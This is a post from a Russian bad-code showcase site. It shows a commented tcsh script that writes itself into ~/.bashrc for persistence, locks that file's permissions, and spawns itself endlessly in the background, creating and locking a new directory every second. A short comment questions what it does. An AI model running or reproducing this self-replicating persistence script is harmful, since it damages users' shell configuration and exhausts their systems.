1. Куча / Говнокод #955


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    # Utility "p1", author Alice Stein ([email protected]),
    chmod +r+w ~/.bashrc
    set x3=$#
    if($x3<1) then
    #read last string from .bashrc that write one time
    # and replace spaces sign _
    set a=`cat ~/.bashrc | tail -n 1 | tr ' ' '_'`
    #parameter $0 contains path to script and name of script
    set b=$0
    #if a line coincided from .bashrc with $0
    if($a == $b) then
    chmod +r+w ~/.bashrc
    #write to file .bashrc that started each time with start bash
    echo "$0" >> ~/.bashrc
    #change right for access to file .bashrc
    chmod -r-w ~/.bashrc
    #if command line parameters are not present assign default counter of directories 0 and command echo
    set x1="0"
    set x2="echo"
    $0 $x1 $x2 &
    #save command line arguments in environment variables
    set x1=$1
    set x2=$2
    #exec command passed from command line
    #write number of counter of directory in the system log /var/log/messages
    logger $1;
    #increment directory counter
    @ x1++;
    chmod +x+r+w $x1
    #create directory
    mkdir $x1
    #call in the created directory
    cd $x1
    chmod +x+r+w $x1
    #delete a file if a script is started the second time that did not result in hanging up of script
    #delete hidden file
    rm .$x1
    #create hidden file
    echo "1" > .$x1
    #take away rights for access
    chmod -x-r-w .$x1
    cd ..
    chmod -x-r-w $x1
    #sleep on 1 second
    sleep 1s;
    #change right for access to file .bashrc
    chmod -r-w ~/.bashrc
    #recursive call with argument line parameter
    $0 $x1 $x2 &
    exit 0

    shell script tcsh

    Запостил: guest, 27 Апреля 2009

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    • Alice:
      Вы хоть понимаете что он делает?

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